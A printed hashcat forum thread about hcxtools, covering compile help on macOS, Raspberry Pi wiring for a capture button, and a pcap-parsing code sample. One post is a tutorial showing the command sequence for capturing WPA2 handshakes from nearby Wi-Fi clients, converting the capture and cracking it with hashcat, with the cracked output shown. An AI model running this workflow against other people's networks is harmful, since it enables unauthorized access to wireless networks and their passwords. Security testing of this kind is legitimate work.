hcxtools - solution for capturing wlan traffic and conversion to hashcat formats - Printable Version

+- hashcat Forum (https://hashcat.net/forum)
+-- Forum: Misc (https://hashcat.net/forum/forum-15.html)
+--- Forum: User Contributions (https://hashcat.net/forum/forum-25.html)
+--- Thread: hcxtools - solution for capturing wlan traffic and conversion to hashcat formats (/thread-6661.html)

RE: hcxtools - solution for capturing wlan traffic and conversion to hashcat formats - QYQ - 07-22-2017

I have a problem with make install: there is no <linux/wireless.h> file.
My system is macOS Sierra 10.12.6.
How can I find the missing file?
Thanks.

RE: hcxtools - solution for capturing wlan traffic and conversion to hashcat formats - ZerBea - 07-22-2017

Hi.
This is only the first fatal error you got. There will be many more...
You will have to find a replacement for linux iwlib.

The Apple Developer Connection website has a lot of articles which talk about porting progs between environments. You'll need to read these first (and similar articles on the Internet) to get a better sense of the issues involved.
"Certainly, it can be done. In fact, it is fairly routine."
But it's really too much for a forum post here.

And from hcxtools READ.me
Requirements: Linux
That's because I'm a very, very lazy coder. That means if there is a library which is able to do the job better than my tools, I'll use this lib.

Maybe a solution:
edit the Makefile and remove all entries wlandump-ng and wlanresponse (these are extremely hardware-near coded)
then try to compile hcxtools
maybe that works for you
use a raspberry pi A+, B+ to capture
do not use a raspberry pi 3 (wifi soc doesn't work - no monitor mode)
do not use wlandump-ng or wlanresponse on virtual devices like monx (mon0,...)

RE: hcxtools - solution for capturing wlan traffic and conversion to hashcat formats - ZerBea - 07-22-2017

basic tutorial about the features to capture passwords from wlantraffic

1. Choose a place where you expect to receive many, many clients.
Run wlandump-ng or wlanresponse for a while (one or more hours) using these options:

on a notebook
    wlandump-ng -i <mywlandevice> -o test.cap -c 1 -t 4 -d 20 -D 2 -m 512 -b -r -l -L -s 20

on a raspberry
    wlandump-ng -i <mywlandevice> -o test.cap -c 1 -t 4 -d 20 -D 2 -m 128 -b -r -l -L -s 0

    wlanresponse -i <mywlandevice> -o test.cap -t 3 -b -l -L

<mywlandevice> is your WLAN device (it must already be running in monitor mode on a real device - do not use virtual devices like mon0).

Please download and use the attached test.cap for this tutorial: test.cap.zip
Extract and copy the cap to a folder and open a terminal inside.

2. Let's check the cap:

    $ wlancapinfo -i test.cap
    input file.......: test.cap
    magic file number: 0xa1b2c3d4 (cap/pcap)
    major version....: 2
    minor version....: 4
    data link type...: 105 (DLT_IEEE802_11) [http://www.tcpdump.org/linktypes.html]
    packets inside...: 6
    last pcap error..: flawless

The cap looks like a normal cap, but you should convert it only by using wlancap2hcx, because there is information inside that other tools are not able to strip.

Let's convert the cap:

    $ wlancap2hcx -o test.hccapx -e wordlist test.cap
    start reading from test.cap
    6 packets processed (6 wlan, 0 lan, 0 loopback)
    found 1 wpa2 AES Cipher, HMAC-SHA1
    found 1 valid wpa handshake (by wlandump-ng/wlanresponse)

You can see that there's a valid WPA2 handshake inside and that wlandump-ng/wlanresponse initiates the authentication with the client. No accesspoint captured - there is no need to capture an accesspoint to get the data!
We use the -e option to save networknames and passwords to a file (it's a good idea to use this option every time you run wlancap2hcx).

    $ ls
    test.hccapx  test.cap  wordlist

now sort our wordlist

    $ sort wordlist | uniq > wordlistsort

You need to do this, because there are many dupes inside.

    $ ls
    test.hccapx  test.cap  wordlist  wordlistsort

now run hashcat

    $ hashcat -m 2500 --potfile-path=hc2500.pot test.hccapx wordlistsort
    hashcat (v3.6.0-247-g8f2cbb26) starting...

    Session..........: hashcat
    Status...........: Cracked
    Hash.Type........: WPA/WPA2
    Hash.Target......: UPC501953949 (AP:8c:84:01:09:e9:e6 STA:bc:44:86:a1:66:82)
    Time.Started.....: Sat Jul 22 09:59:12 2017 (0 secs)
    Time.Estimated...: Sat Jul 22 09:59:12 2017 (0 secs)
    Guess.Base.......: File (wordlistsort)
    Guess.Queue......: 1/1 (100.00%)
    Speed.Dev.#1.....: 0 H/s (0.36ms)
    Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
    Progress.........: 2/2 (100.00%)
    Rejected.........: 0/2 (0.00%)
    Restore.Point....: 0/2 (0.00%)
    Candidates.#1....: AXNDFNEU -> UPC501953949
    HWMon.Dev.#1.....: Temp: 42c Fan: 28% Util:100% Core:1303MHz Mem:3004MHz Bus:8

Take a look into the potfile and you can imagine what's going on.
You cracked the hash, using the captured password from wlantraffic.
It's a good idea to add/copy/cat the wordlist to your wordlist(s) - every time you run wlancap2hcx on new cap files.

RE: hcxtools - solution for capturing wlan traffic and conversion to hashcat formats - QYQ - 07-22-2017

(07-22-2017, 09:36 AM)ZerBea Wrote: Hi.

Ok, I will have a try. Thanks anyway.

RE: hcxtools - solution for capturing wlan traffic and conversion to hashcat formats - ZerBea - 07-22-2017

Well, let's see how it works.
How about hcxkeys? Are you able to compile them?

RE: hcxtools - solution for capturing wlan traffic and conversion to hashcat formats - DaKahuna - 07-23-2017

(07-22-2017, 06:33 AM)QYQ Wrote: I have a problem with make install: there is no <linux/wireless.h> file

Run an Ubuntu VM in VMware Fusion. Works very well. You will need to use a supported USB WiFi adapter but you would want to do that anyway.

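The fields wlancapinfo prints in the tutorial above (magic number, version, data link type, packet count, last error) all come from the classic pcap file layout; the following is an added example, not part of any post in this thread and not hcxtools code, that reads them and bounds-checks every record length before trusting it. The function names, the dictionary keys and the sample capture are constructed for illustration.

```python
import struct

# Magic values of the classic pcap format (microsecond and nanosecond timestamps).
PCAP_MAGICS = {0xA1B2C3D4: "cap/pcap", 0xA1B23C4D: "cap/pcap (nanosecond)"}
DLT_IEEE802_11 = 105  # raw 802.11 frames, the link type shown in the tutorial


def pcap_info(blob: bytes) -> dict:
    """Summarise a classic pcap file: header fields, packet count, first error."""
    if len(blob) < 24:
        raise ValueError("shorter than the 24-byte pcap global header")
    # The magic number reveals the byte order the writer used.
    for endian in ("<", ">"):
        magic = struct.unpack(endian + "I", blob[:4])[0]
        if magic in PCAP_MAGICS:
            break
    else:
        raise ValueError("not a classic pcap file (pcapng or another format)")
    major, minor, _zone, _sigfigs, _snaplen, linktype = struct.unpack(
        endian + "HHiIII", blob[4:24])
    # Hypothetical result keys; "flawless" mirrors the wording of wlancapinfo.
    info = {"magic": magic, "major": major, "minor": minor,
            "linktype": linktype, "packets": 0, "error": "flawless"}
    offset = 24
    while offset < len(blob):
        if offset + 16 > len(blob):
            info["error"] = "truncated record header"
            break
        _sec, _frac, incl_len, _orig_len = struct.unpack(
            endian + "IIII", blob[offset:offset + 16])
        # incl_len comes from the file itself: never read past the buffer.
        if offset + 16 + incl_len > len(blob):
            info["error"] = "record length exceeds file size"
            break
        info["packets"] += 1
        offset += 16 + incl_len
    return info


def build_sample(frames, linktype=DLT_IEEE802_11, snaplen=65535) -> bytes:
    """Constructed sample capture (little-endian, version 2.4) for the demo."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, snaplen, linktype)
    for i, frame in enumerate(frames):
        out += struct.pack("<IIII", 1500000000 + i, 0, len(frame), len(frame))
        out += frame
    return out


if __name__ == "__main__":
    sample = build_sample([b"\x80\x00" + bytes(22)] * 6)  # six dummy frames
    print(pcap_info(sample))
```
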
RE: hcxtools - solution for capturing wlan traffic and conversion to hashcat formats - ZerBea - 08-03-2017

Read more about the authentication process and the importance of the message M2 here:
https://hashcat.net/forum/thread-6745-post-36007.html#pid36007

RE: hcxtools - solution for capturing wlan traffic and conversion to hashcat formats - winxp5421 - 08-04-2017

Can you post up a clear GPIO pinout and what is needed for the hardware mod? I would assume a switch and a couple of LEDs, but a pinout explanation would be nice.

Thanks,
Winxp

RE: hcxtools - solution for capturing wlan traffic and conversion to hashcat formats - ZerBea - 08-04-2017

Circuit:
https://github.com/ZerBea/hcxtools/blob/master/gpiowait.odg

Parts:
1 x LED, Low-Current (Kingbright 2.2 V, 2 mA)
1 x Resistor 10k Ohms
1 x Resistor 330 Ohms
1 Push Button
20cm cable

GPIO         pin   pin   GPIO
-------------------------------------
3V3           1          5V
1/3 (SCL)           6    0V
4             7          14 (TXD)
17 (ce1)     11          18 (ce0)

Basic tutorial how to "wiringpi"
https://www.sunfounder.com/forum/how-to-apply-wiringpi-gpio-on-raspberry-pi/?p=1

RE: hcxtools - solution for capturing wlan traffic and conversion to hashcat formats - winxp5421 - 08-04-2017

Thanks, much obliged.